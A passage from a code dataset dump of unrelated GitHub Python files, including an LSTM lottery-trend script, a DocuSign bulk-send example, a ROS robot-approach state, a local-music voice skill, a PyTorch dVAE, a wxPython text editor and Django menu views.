loadDataFromCsv.data_sum_by_blue(dataset,look_back)\nprint(dataset_red_x.shape)\nprint(dataset_red_y.shape)\n\nx = dataset_red_x[:,1:(look_back+1)]/24\ny = dataset_red_y/24\n\nprint(x.shape)\n\ntrain_size = int(len(x)*0.7)\ntest_size = len(x) - train_size\n\ntrain_x, train_y, test_x,test_y = x[0:train_size,:],y[0:train_size],x[train_size:len(x),:],y[train_size:len(x)]\nimport numpy\ntrain_x = numpy.reshape(train_x,(train_x.shape[0],1,look_back))\ntest_x = numpy.reshape(test_x,(test_x.shape[0],1,look_back))\n\nprint(train_x.shape)\nimport tensorflow\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n# create and fit the LSTM network\nmodel = Sequential()\nmodel.add(LSTM(5, input_shape=(train_x.shape[1], train_x.shape[2])))\nmodel.add(Dense(1))\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.fit(train_x, train_y, epochs=2000, batch_size=5, verbose=2)\n\n\ntrainPredict = model.predict(train_x)\ntestPredict = model.predict(test_x)\n\nimport matplotlib.pyplot as plt\n\nplt.plot(test_y*24)\nplt.plot(testPredict*24)\nplt.show()\n\ndef main():\n return","repo_name":"Unlearner/lottory","sub_path":"lstmForOverallTrend.py","file_name":"lstmForOverallTrend.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"73955515787","text":"import base64\nfrom os import path\n\nfrom docusign_esign import EnvelopesApi, Document, Signer, EnvelopeDefinition, Recipients, \\\n BulkEnvelopesApi, TextCustomField, CustomFields, Tabs, SignHere\nfrom docusign_esign.models import BulkSendingCopy, BulkSendingList, BulkSendingCopyRecipient, BulkSendingCopyTab, \\\n BulkSendRequest, BulkSendBatchStatus\nfrom flask import request, session\n\nfrom ...consts import demo_docs_path, pattern\nfrom ...docusign import create_api_client\nfrom ...ds_config import DS_CONFIG\n\n\nclass Eg031BulkSendController:\n @staticmethod\n def get_args():\n # More data validation would be a good idea here\n # Strip anything other than the characters listed\n signer_email_1 = pattern.sub(\"\", request.form.get(\"signer_email_1\"))\n signer_name_1 = pattern.sub(\"\", request.form.get(\"signer_name_1\"))\n cc_email_1 = pattern.sub(\"\", request.form.get(\"cc_email_1\"))\n cc_name_1 = pattern.sub(\"\", request.form.get(\"cc_name_1\"))\n signer_email_2 = pattern.sub(\"\", request.form.get(\"signer_email_2\"))\n signer_name_2 = pattern.sub(\"\", request.form.get(\"signer_name_2\"))\n cc_email_2 = pattern.sub(\"\", request.form.get(\"cc_email_2\"))\n cc_name_2 = pattern.sub(\"\", request.form.get(\"cc_name_2\"))\n\n args = {\n \"account_id\": session[\"ds_account_id\"], # Represents your {ACCOUNT_ID}\n \"base_path\": session[\"ds_base_path\"],\n \"access_token\": session[\"ds_access_token\"], # Represents your {ACCESS_TOKEN}\n \"doc_pdf\": path.join(demo_docs_path, DS_CONFIG[\"doc_pdf\"]),\n \"signers\": [\n {\n \"signer_name\": signer_name_1,\n \"signer_email\": signer_email_1,\n \"cc_email\": cc_email_1,\n \"cc_name\": cc_name_1\n },\n {\n \"signer_name\": signer_name_2,\n \"signer_email\": signer_email_2,\n \"cc_email\": cc_email_2,\n \"cc_name\": cc_name_2\n }\n ]\n }\n return args\n\n @classmethod\n def worker(cls, args):\n \"\"\"\n 1. Create an api client and construct API clients\n 2. Create and submit a bulk sending list\n 3. Create a draft envelope\n 4. Add custom fields to the envelope\n 5. Add recipients to the envelope\n 6. Initiate bulk envelope sending\n 7. Confirm sending success\n \"\"\"\n\n # Construct your API headers\n #ds-snippet-start:eSign31Step2\n api_client = create_api_client(base_path=args[\"base_path\"], access_token=args[\"access_token\"])\n #ds-snippet-end:eSign31Step2\n\n # Submit a bulk list\n #ds-snippet-start:eSign31Step3\n bulk_envelopes_api = BulkEnvelopesApi(api_client)\n bulk_sending_list = cls.create_bulk_sending_list(args[\"signers\"])\n bulk_list = bulk_envelopes_api.create_bulk_send_list(\n account_id=args[\"account_id\"],\n bulk_sending_list=bulk_sending_list\n )\n bulk_list_id = bulk_list.list_id\n #ds-snippet-end:eSign31Step3\n\n # Create an envelope\n #ds-snippet-start:eSign31Step4\n envelope_api = EnvelopesApi(api_client)\n envelope_definition = cls.make_draft_envelope(args[\"doc_pdf\"])\n envelope = envelope_api.create_envelope(account_id=args[\"account_id\"], envelope_definition=envelope_definition)\n envelope_id = envelope.envelope_id\n #ds-snippet-end:eSign31Step4\n\n # Attach your bulk list id to the envelope\n #ds-snippet-start:eSign31Step5\n text_custom_fields = TextCustomField(name=\"mailingListId\", required=\"false\", show=\"false\", value=bulk_list_id)\n custom_fields = CustomFields(list_custom_fields=[], text_custom_fields=[text_custom_fields])\n envelope_api.create_custom_fields(\n account_id=args[\"account_id\"],\n envelope_id=envelope_id,\n custom_fields=custom_fields\n )\n #ds-snippet-end:eSign31Step5\n\n # Initiate bulk send\n #ds-snippet-start:eSign31Step6\n bulk_send_request = BulkSendRequest(envelope_or_template_id=envelope_id)\n batch = bulk_envelopes_api.create_bulk_send_request(\n account_id=args[\"account_id\"],\n bulk_send_list_id=bulk_list_id,\n bulk_send_request=bulk_send_request\n )\n batch_id = batch.batch_id\n #ds-snippet-end:eSign31Step6\n\n # Confirm successful batch send\n #ds-snippet-start:eSign31Step7\n response = bulk_envelopes_api.get_bulk_send_batch_status(account_id=args[\"account_id\"],\n bulk_send_batch_id=batch_id)\n #ds-snippet-end:eSign31Step7\n print(response)\n\n return response\n\n @classmethod\n def create_bulk_sending_list(cls, args):\n \"\"\"\n 1. Create recipient objects with signers\n 2. Create recipient objects with ccs\n 3. Create bulk copies objects\n 4. Create the bulk sending list object\n \"\"\"\n\n bulk_copies = []\n for signer in args:\n recipient_1 = BulkSendingCopyRecipient(\n role_name=\"signer\",\n tabs=[],\n name=signer[\"signer_name\"],\n email=signer[\"signer_email\"]\n )\n\n recipient_2 = BulkSendingCopyRecipient(\n role_name=\"cc\",\n tabs=[],\n name=signer[\"cc_name\"],\n email=signer[\"cc_email\"]\n )\n\n bulk_copy = BulkSendingCopy(\n recipients=[recipient_1, recipient_2],\n custom_fields=[]\n )\n\n bulk_copies.append(bulk_copy)\n\n bulk_sending_list = BulkSendingList(\n name=\"sample\",\n bulk_copies=bulk_copies\n )\n\n return bulk_sending_list\n \n @classmethod\n def make_draft_envelope(cls, doc_pdf):\n \"\"\"\n Creates the envelope\n \"\"\"\n\n # Open the example file\n with open(doc_pdf, \"rb\") as file:\n content_bytes = file.read()\n base64_file_content = base64.b64encode(content_bytes).decode(\"ascii\")\n\n document = Document(\n document_base64=base64_file_content,\n name=\"lorem\",\n file_extension=\"pdf\",\n document_id=2\n )\n\n # Add placeholder tabs\n\n recipient_sign_here = SignHere(\n anchor_string=\"/sn1/\",\n anchor_units=\"pixels\",\n anchor_y_offset=\"10\",\n anchor_x_offset=\"20\",\n tab_label=\"RecipentTab\"\n )\n\n # Add placeholder recipients\n cc = Signer(\n name=\"Multi Bulk Recipient::cc\",\n email=\"multiBulkRecipients-cc@docusign.com\",\n role_name=\"cc\",\n note=\"\",\n routing_order=\"2\",\n status=\"created\",\n delivery_method=\"email\",\n recipient_id=\"1\",\n recipient_type=\"signer\"\n )\n\n signer = Signer(\n name=\"Multi Bulk Recipient::signer\",\n email=\"multiBulkRecipients-signer@docusign.com\",\n role_name=\"signer\",\n note=\"\",\n routing_order=\"1\",\n status=\"created\",\n delivery_method=\"email\",\n recipient_id=\"2\",\n recipient_type=\"signer\"\n )\n\n signer.tabs = Tabs(sign_here_tabs=[recipient_sign_here])\n\n envelope_definition = EnvelopeDefinition(\n email_subject=\"Please Sign\",\n documents=[document],\n status=\"created\",\n envelope_id_stamping=\"true\",\n recipients={},\n )\n\n envelope_definition.recipients = Recipients(signers=[signer], carbon_copies=[cc])\n\n return envelope_definition\n","repo_name":"docusign/code-examples-python","sub_path":"app/eSignature/examples/eg031_bulk_send.py","file_name":"eg031_bulk_send.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"82"} +{"seq_id":"36778330480","text":"#!/usr/bin/env python\nimport numpy\nimport rospy\nimport smach\nimport smach_ros\nimport math\nimport tf\nfrom std_msgs.msg import Float32MultiArray, Float64, String\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\n###################################################################################\n###################################################################################\n### ###\n### Mapa de outcomes: ###\n### X = not using /// - = using ###\n### ###\n### - success = estado completo e nao existem outros objetos na lista ###\n### X in_progress = estado completo mas ainda existem outros objetos ###\n### - no_tf = kinect nao foi capaz de encontrar a transformada dos objetos ###\n### - no_objects = nao foram passados objetos para o estado ###\n### ###\n###################################################################################\n###################################################################################\n\n\nclass get_close2(smach.State):\n #------------------------------------------------------------------------\n # Variaveis que so precisam ser declaradas uma vez na maquina de estados\n def __init__(self, outcomes=['success', 'no_tf', 'no_objects']):\n smach.State.__init__(self, outcomes=['success', 'no_tf', 'no_objects'], output_keys=['namesids', 'coordX', 'coordY', 'coordZ'], input_keys=['namesids'])\n self.distance_laser = 0.3 #distancia minima entre laser e obstaculo\n self.first_object = []\n self.max_range = 0.4\n self.increment = 2 * math.pi / 180 #incremento no angulo do kinect (5 graus em radianos)\n self.kin_pub = rospy.Publisher('/tilt_head/command', Float64, queue_size=1) #publisher do servo da cabeca\n self.laser = 0\n self.n = 0 #valor inicial do contador (nunca alterar)\n self.pub_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=10) #publisher para movimentar a base\n self.vel = Twist()\n rospy.Subscriber('/scan', LaserScan, self.laser_callback)\n\n#------------------------------------------------------------------------\n# Retornar o valor da menor distancia captada pelo laser\n\n def laser_callback(self, msg):\n self.laser = min(msg.ranges[130:180])\n\n#------------------------------------------------------------------------\n# Move a base ate o objeto, de forma a deixar o manipulador posicionado para pegar o objeto\n\n def move_base(self):\n print(\"no move_base\")\n self.vel.linear.z = 0\n #print \"y = \" + str(trans_manip[1])\n if self.laser >= (self.distance_laser - self.max_range):\n self.vel.linear.x = 0.1\n print(\"vel = \" + str(self.vel.linear.x))\n else:\n self.vel.linear.x = 0\n self.vel.linear.y = 0\n print(\"vel = \" + str(self.vel.linear.x))\n self.pub_vel.publish(self.vel)\n#------------------------------------------------------------------------\n# Move a base para traz para nao bater\n\n def too_close(self):\n print(\"no too_close\")\n print(\"laser = \" + str(self.laser))\n time = rospy.get_time()\n while (rospy.get_time() - time <= 1.0):\n self.vel.linear.x = -0.1\n self.vel.linear.y = 0\n self.vel.linear.z = 0\n self.pub_vel.publish(self.vel)\n self.vel.linear.x = 0\n self.pub_vel.publish(self.vel)\n#------------------------------------------------------------------------\n# Move o kinect para cima ou para baixo para encontrar a transformada\n\n def move_kinect(self):\n print(\"no kinect\")\n if self.cont < 35:\n rospy.sleep(0.5)\n self.j = self.j + 12 * self.increment * self.i / 20\n print(\"angulo kinect (self.j) = \" + str(self.j))\n self.kin_pub.publish(self.j)\n self.cont += 1\n else:\n self.cont = 0\n self.i = -1 * self.i\n#------------------------------------------------------------------------\n# Tenta fazer a transformada entre objeto e manipulador\n\n def tf_check(self):\n while self.check == False:\n try:\n print(\"entrou tf\")\n print(\"laser = \" + str(self.laser))\n (self.trans, self.rot) = self.listener.lookupTransform(\"/object_%i\" % self.first_object, \"/manipulator\", rospy.Time(0))\n self.check = True\n except tf.Exception:\n self.move_kinect()\n self.check = False\n self.n += 1\n print(\"n = \" + str(self.n))\n if self.n == 70:\n self.check = True\n#------------------------------------------------------------------------\n# Main code com as variaveis que precisam sofrer reset cada vez que o estado chamado mais de uma vez\n\n def execute(self, userdata):\n self.check = False #booleano para checar se a tf do objeto foi encontrada\n self.cont = 0 #auxiliar para mover o angulo do kinect\n self.done = False #booleano para checar se a tarefa terminou\n self.i = -1 #auxiliar para inverter a direcao de movimento da cabeca\n self.j = 0\n self.rot = []\n self.trans = []\n self.listener = tf.TransformListener()\n self.kin_pub.publish(0) #inicia o servo em angulo em 0\n #------------------------------------------------------------------------\n # Garantindo presenca de um objeto\n if userdata.namesids == []:\n self.first_object = []\n else:\n self.first_object = userdata.namesids[0][1]\n#------------------------------------------------------------------------\n# Caso o kinect ja tenha atingido seu limite antes\n if self.n == 70:\n print(\"resetando\")\n self.n = 0\n#------------------------------------------------------------------------\n# Main loop\n while self.done == False:\n rospy.logwarn('general info')\n print(\"laser = \" + str(self.laser))\n print(\"self.distance_laser (padrao) = \" + str(self.distance_laser))\n rospy.logwarn(\"-\" * 50)\n #------------------------------------------------------------------------\n # Aproximacao\n if (self.laser > self.distance_laser):\n self.move_base()\n #------------------------------------------------------------------------\n # Posicao ideal\n elif self.laser >= (self.distance_laser - self.max_range):\n self.vel.linear.x = 0\n self.pub_vel.publish(self.vel)\n #del userdata.namesids[0]\n if self.first_object == []:\n return 'no_objects'\n else:\n self.tf_check()\n if self.n == 70:\n rospy.loginfo('no tf found')\n self.kin_pub.publish(0)\n return 'no_tf'\n# elif userdata.namesids != []:\n# rospy.loginfo('in_progress')\n# return 'in_progress'\n else:\n rospy.logwarn('ending state, success')\n print('self.trans =' + str(self.trans) + '\\n')\n print(\"coordenadas p/ manipulador:\")\n print(\"x' = \" + str(self.trans[0] * 1000))\n print(\"y' = \" + str(self.trans[1] * 1000))\n print(\"z' = \" + str(self.trans[2] * 1000))\n print(\"#\" * 30)\n return 'success'\n #------------------------------------------------------------------------\n # Evita bater\n elif self.laser < (self.distance_laser - self.max_range):\n self.too_close()\n\n #------------------------------------------------------------------------\n\n\n# def execute2(self,userdata):\n# try:\n# execute_main()\n# except rospy.ROSInterruptException:\n# pass\n","repo_name":"phdomingues/Robo","sub_path":"get_close2.py","file_name":"get_close2.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4454085276","text":"from threading import Thread, Event\nfrom typing import List, Optional\nfrom os.path import join, dirname, expanduser, isdir\nfrom random import sample\n\nfrom ovos_plugin_common_play import MediaType, PlaybackType\nfrom ovos_workshop.skills.common_play import OVOSCommonPlaybackSkill, \\\n ocp_search\nfrom ovos_utils import classproperty\nfrom ovos_utils.log import LOG\nfrom ovos_utils.process_utils import RuntimeRequirements\nfrom ovos_utils.xdg_utils import xdg_cache_home\n\nfrom .util import MusicLibrary, Track\n\n\nclass LocalMusicSkill(OVOSCommonPlaybackSkill):\n def __init__(self, **kwargs):\n self.supported_media = [MediaType.MUSIC,\n MediaType.AUDIO,\n MediaType.GENERIC]\n self.library_update_event = Event()\n self._music_library = None\n self._image_url = join(dirname(__file__), 'ui/music-solid.svg')\n self._demo_dir = join(expanduser(xdg_cache_home()), \"neon\",\n \"demo_music\")\n OVOSCommonPlaybackSkill.__init__(self, **kwargs)\n\n @classproperty\n def runtime_requirements(self):\n return RuntimeRequirements(network_before_load=False,\n internet_before_load=False,\n gui_before_load=False,\n requires_internet=False,\n requires_network=False,\n requires_gui=False,\n no_internet_fallback=True,\n no_network_fallback=True,\n no_gui_fallback=True)\n\n @property\n def demo_url(self) -> Optional[str]:\n # default_url = \"https://2222.us/app/files/neon_music/music.zip\"\n return self.settings.get(\"demo_url\")\n\n @property\n def music_dir(self) -> str:\n # default_path = \"/media\"\n return expanduser(self.settings.get('music_dir', \"\"))\n\n @property\n def music_library(self):\n if not self._music_library:\n LOG.info(f\"Initializing music library at: {self.music_dir}\")\n self._music_library = MusicLibrary(self.music_dir,\n self.file_system.path)\n return self._music_library\n\n # TODO: Move to __init__ after ovos-workshop stable release\n def initialize(self):\n # TODO: add intent to update library?\n Thread(target=self.update_library, daemon=True).start()\n\n def update_library(self):\n self.library_update_event.clear()\n if self.music_dir and isdir(self.music_dir):\n LOG.debug(f\"Load configured directory: {self.music_dir}\")\n self.music_library.update_library(self.music_dir)\n user_dir = expanduser(\"~/Music\")\n if isdir(user_dir):\n LOG.debug(f\"Load default directory: {self.music_dir}\")\n self.music_library.update_library(user_dir)\n if self.demo_url and not isdir(self._demo_dir):\n LOG.info(f\"Downloading Demo Music from: {self.demo_url}\")\n self._download_demo_tracks()\n elif isdir(self._demo_dir):\n self.music_library.update_library(self._demo_dir)\n self.library_update_event.set()\n\n @ocp_search()\n def search_music(self, phrase, media_type=MediaType.GENERIC):\n if not self.library_update_event.wait(5):\n LOG.warning(\"Library update in progress; results may be limited\")\n results = self.search_artist(phrase, media_type) + \\\n self.search_album(phrase, media_type) + \\\n self.search_genre(phrase, media_type) + \\\n self.search_track(phrase, media_type)\n if not results and self.voc_match(phrase, 'local.voc'):\n score = 60\n if media_type == MediaType.MUSIC:\n score += 20\n else:\n LOG.debug(\"No media type requested\")\n all_songs = self.music_library.all_songs\n if len(all_songs) > 50:\n all_songs = sample(self.music_library.all_songs, 50)\n results = self._tracks_to_search_results(all_songs, score)\n LOG.debug(f\"Returning all songs with score={score}\")\n LOG.info(f\"Returning {len(results)} results\") # conf 65\n return results\n\n def search_artist(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 65\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_artist(phrase)\n LOG.debug(f\"Found {len(tracks)} artist results\")\n return self._tracks_to_search_results(tracks, score)\n\n def search_album(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 70\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_album(phrase)\n LOG.debug(f\"Found {len(tracks)} album results\")\n return self._tracks_to_search_results(tracks, score)\n\n def search_genre(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 50\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_genre(phrase)\n LOG.debug(f\"Found {len(tracks)} genre results\")\n return self._tracks_to_search_results(tracks, score)\n\n def search_track(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 75\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_track(phrase)\n LOG.debug(f\"Found {len(tracks)} track results\")\n return self._tracks_to_search_results(tracks, score)\n\n def _tracks_to_search_results(self, tracks: List[Track], score: int = 20):\n # TODO: Lower confidence if path is in demo dir\n tracks = [{'media_type': MediaType.MUSIC,\n 'playback': PlaybackType.AUDIO,\n 'image': track.artwork if track.artwork else None,\n 'skill_icon': self._image_url,\n 'uri': track.path,\n 'title': track.title,\n 'artist': track.artist,\n 'length': track.duration_ms,\n 'match_confidence': score} for track in tracks]\n return tracks\n\n def _download_demo_tracks(self):\n from ovos_skill_installer import download_extract_zip\n download_extract_zip(self.demo_url, self._demo_dir)\n self.music_library.update_library(self._demo_dir)\n","repo_name":"NeonGeckoCom/skill-local_music","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"27958917917","text":"import torch\nimport numpy as np\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nimport re\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.models.resnet import ResNet, BasicBlock\nfrom torchvision.models.densenet import DenseNet\n# convert data to torch.FloatTensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nimport utils\nimport os\n\nclass dVAE_Encoder(nn.Module):\n\n def __init__(self):\n super(dVAE_Encoder, self).__init__()\n self.conv1 = nn.Conv2d(4, 8, 6, stride=1, dilation=1, padding=2)\n self.conv2 = nn.Conv2d(8, 16, 5, stride=2, dilation=2, padding=3)\n self.conv3 = nn.Conv2d(16, 16, 6, stride=1, dilation=2, padding=5)\n self.conv4 = nn.Conv2d(16, 16, 5, stride=3, dilation=2)\n\n self.bn1 = nn.BatchNorm2d(8)\n self.bn2 = nn.BatchNorm2d(16)\n self.bn3 = nn.BatchNorm2d(16)\n self.bn4 = nn.BatchNorm2d(16)\n\n def forward(self, x):\n x = x.float().cuda()\n x = self.conv1(F.leaky_relu(x))\n x = F.pad(x, (1, 0, 1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn1(x)\n # print(x.shape)\n x = self.conv2(F.leaky_relu(x))\n x = F.pad(x, (1, 0, 1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn2(x)\n # print(x.shape)\n x = self.conv3(F.leaky_relu(x))\n x = self.bn3(x)\n # print(x.shape)\n x = self.conv4(F.leaky_relu(x))\n x = self.bn4(x)\n # print(x.shape)\n # print(\"---------------------------------\")\n # print(x.size())\n return x\n\n\nclass dVAE_Decoder(nn.Module):\n\n def __init__(self):\n super(dVAE_Decoder, self).__init__()\n self.conv1 = nn.ConvTranspose2d(8, 4, 6, stride=1, dilation=1, padding=2)\n self.conv2 = nn.ConvTranspose2d(16, 8, 5, stride=2, dilation=2, padding=3)\n self.conv3 = nn.ConvTranspose2d(16, 16, 6, stride=1, dilation=2, padding=5)\n self.conv4 = nn.ConvTranspose2d(16, 16, 5, stride=3, dilation=2)\n\n self.bn1 = nn.BatchNorm2d(4)\n self.bn2 = nn.BatchNorm2d(8)\n self.bn3 = nn.BatchNorm2d(16)\n self.bn4 = nn.BatchNorm2d(16)\n\n def forward(self, x):\n x = x.float().cuda()\n x = self.conv4(F.leaky_relu(x))\n x = F.pad(x, (3, 3, 3, 3, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn4(x)\n # print(x.shape)\n x = self.conv3(F.leaky_relu(x))\n x = self.bn3(x)\n # print(x.shape)\n x = self.conv2(F.leaky_relu(x))\n x = F.pad(x, (-1, 0, -1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn2(x)\n # print(x.shape)\n x = self.conv1(F.leaky_relu(x))\n x = F.pad(x, (-1, 0, -1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn1(x)\n # print(x.shape)\n # print(x.size())\n return x\n\n\nclass dVAE(nn.Module):\n def __init__(self):\n super(dVAE, self).__init__()\n self.encoder = dVAE_Encoder()\n\n self.conv_mu = nn.Conv2d(16, 16, 3, stride=1, dilation=1)\n self.conv_logvar = nn.Conv2d(16, 16, 3, stride=1, dilation=1)\n\n self.decoder = dVAE_Decoder()\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return mu + eps * std\n\n def forward(self, x):\n x = x.float().cuda()\n latent = self.encoder(x)\n\n mu = self.conv_mu(latent)\n logvar = self.conv_logvar(latent)\n\n z = self.reparameterize(mu, logvar)\n # print(\"----------\")\n # print(z.shape)\n # print(\"----------\")\n answer = self.decoder(z)\n \n return answer, mu, logvar\n\n import torch\n from torch.utils import data\n import random\n from torch.utils.data import dataloader, random_split\n\n","repo_name":"Olbert/VDA_Pytorch","sub_path":"dvae.py","file_name":"dvae.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24776841681","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n dummy = ListNode(next=head)\n startt = dummy\n current = head\n while current:\n unique_flag = True\n while current.next and current.next.val == current.val:\n unique_flag = False\n current = current.next\n \n if unique_flag:\n startt.next = current\n startt = startt.next\n current = current.next\n startt.next = None\n return dummy.next\n","repo_name":"amitchew/competitive-programming","sub_path":"remove-duplicates-from-sorted-list-ii.py","file_name":"remove-duplicates-from-sorted-list-ii.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38029105247","text":"import wx\nimport menu\n\nclass Textpad(wx.Frame):\n \"\"\"\n Description: Base Frame class for the editor\n \n \"\"\"\n def __init__(self):\n \"\"\"\n Description: Initialize the Frame class\n \"\"\"\n super(Textpad, self).__init__(None, size=(800,400))\n self.dir_name = '.'\n self.file_name = \"New File.txt\"\n self.update_list = []\n self.redo_list = []\n self.max_count = 10\n self.content_saved = True\n self.icon_dir = \"icons/\"\n \n self.status_bar = None\n self.tool_bar = None\n \n self.file_menu = None\n self.edit_menu = None\n self.view_menu = None\n \n # Create the panels for our components to stay\n self.toolbar_panel = wx.Panel(self, -1)\n self.editor_panel = wx.Panel(self, -1)\n \n # call the menu and other component creation functions\n self.create_editor_components()\n self.register_event_callbacks()\n \n # Create the sizer and add our panels into that\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.toolbar_panel, 0, flag=wx.EXPAND)\n sizer.Add(self.editor_panel, 1, flag=wx.EXPAND|wx.BOTTOM)\n self.SetSizer(sizer)\n self.SetIcon(wx.Icon(self.icon_dir + 'short_icon.ico', \n wx.BITMAP_TYPE_ICO)\n )\n \n self.Show()\n \n \n\n def create_editor_components(self):\n \"\"\"\n Description: Create all the components(TextArea, Menus,etc...)\n for the editor\n \n \"\"\"\n menu.set_menu_bar(self)\n menu.set_tool_bar(self)\n \n # Create a sizer for our editor text area\n hbox = wx.BoxSizer(wx.HORIZONTAL)\n self.control = wx.TextCtrl(self.editor_panel,\n style=wx.TE_MULTILINE|\n wx.TE_NOHIDESEL)\n hbox.Add(self.control, 1, flag=wx.EXPAND)\n \n vbox = wx.BoxSizer(wx.VERTICAL)\n vbox.Add(hbox, 1, flag=wx.EXPAND)\n self.editor_panel.SetSizer(vbox)\n \n self.status_bar = self.CreateStatusBar()\n self.SetTitle(self.file_name)\n \n def register_event_callbacks(self):\n \"\"\"\n Description: Registers the editor component for \n required event callbacks\n \n \"\"\"\n self.control.Bind(wx.EVT_TEXT, self.text_changed)\n self.control.Bind(wx.EVT_LEFT_UP, self.show_status_text)\n self.control.Bind(wx.EVT_KEY_UP, self.show_status_text)\n self.Bind(wx.EVT_CLOSE, self.window_close)\n\n def window_close(self, event):\n \"\"\"\n Description: Window close event handling function\n input_param: event - close Event \n input_type: Event instance\n\n \"\"\"\n \n if event.CanVeto() and not self.content_saved:\n close_dialog = wx.MessageDialog(self, \n \"Do you want to save before closing?\",\n \"Save Check\",\n wx.YES_NO|wx.CANCEL|wx.ICON_QUESTION)\n return_value = close_dialog.ShowModal()\n window_closed = False\n if return_value == wx.ID_YES:\n self.file_menu.save_file(event)\n window_closed = True\n self.Destroy()\n elif return_value == wx.ID_NO:\n window_closed = True\n self.Destroy()\n elif return_value == wx.ID_CANCEL:\n pass\n event.Veto(window_closed)\n else:\n self.Destroy()\n \n def text_changed(self, event):\n \"\"\"\n Description: call back function for text change \n event on the editor\n input_param: event - text change event\n input_type: event - Event instance\n \n \"\"\"\n if not self.content_saved:\n if len(self.update_list) > self.max_count:\n del self.update_list[0]\n else:\n self.SetTitle(self.file_name + \"*\")\n self.content_saved = False\n self.update_list.append(self.control.GetValue())\n\n def SetTitle(self, title):\n \"\"\"\n Description: Sets the Frame's Tile with the give value\n input_param: title - Title string to set on the window\n input_type: title - string\n \n \"\"\"\n super(Textpad, self).SetTitle('TextPad - %s'%title)\n \n def show_status_text(self, event):\n \"\"\"\n Description: Show the text on the status bar if\n it is visible\n input_param: event - menu change event\n input_type: event - Event instance\n \n \"\"\"\n if self.status_bar and self.status_bar.IsShown():\n start_pos, end_pos = self.control.GetSelection()\n col, line = self.control.PositionToXY(end_pos)\n self.status_bar.SetStatusText(\"line no :{0}, col no:{1}\".format(line+1, col+1))\n if event:\n event.Skip()\n\nif __name__ == '__main__':\n app = wx.App()\n frame = Textpad()\n app.MainLoop()\n","repo_name":"Rk85/Textpad","sub_path":"src/Textpad.py","file_name":"Textpad.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33219869444","text":"from django.http import HttpResponse, JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom .models import *\nfrom cart.models import Category\n\n\n# Create your views here.\ndef index(request):\n context = {\n \"no_of_toppings\": dict(No_of_Topping),\n \"pastas\" : Pastas.objects.all(),\n \"subs\" : Subs.objects.all(),\n \"dinnerplatters\" : DinnerPlatters.objects.all(),\n \"toppings\" : Toppings.objects.all(),\n \"salads\" : Salads.objects.all(), \n \"regular\": Regular_Pizza.objects.all(),\n \"sicilian\": Sicilian_Pizza.objects.all(),\n \"extras\": Extra.objects.all(),\n \"sub_items\": Subs_Items.objects.all(),\n \"platter_items\": Platter_Item.objects.all()\n }\n return render(request, \"orders/index.html\", context)\n\n\n#return each menu item based on selection of the user\ndef pasta(request, item_name):\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Pasta\").id,\n \"price\": Pastas.objects.get(pasta = item_name).price\n }\n return render(request, \"orders/items.html\", context)\n \ndef pizza(request, item_name):\n if item_name == \"Regular Pizza\":\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Regular Pizza\").id,\n \"pizza\": True,\n \"price\": Regular_Pizza.objects.get(size = 'Small', topping = 'Cheese').price,\n \"toppings\": Toppings.objects.all()\n }\n return render(request, \"orders/items.html\", context)\n\n else:\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Sicilian Pizza\").id,\n \"pizza\": True,\n \"price\": Sicilian_Pizza.objects.get(size = 'Small', topping = 'Cheese').price,\n 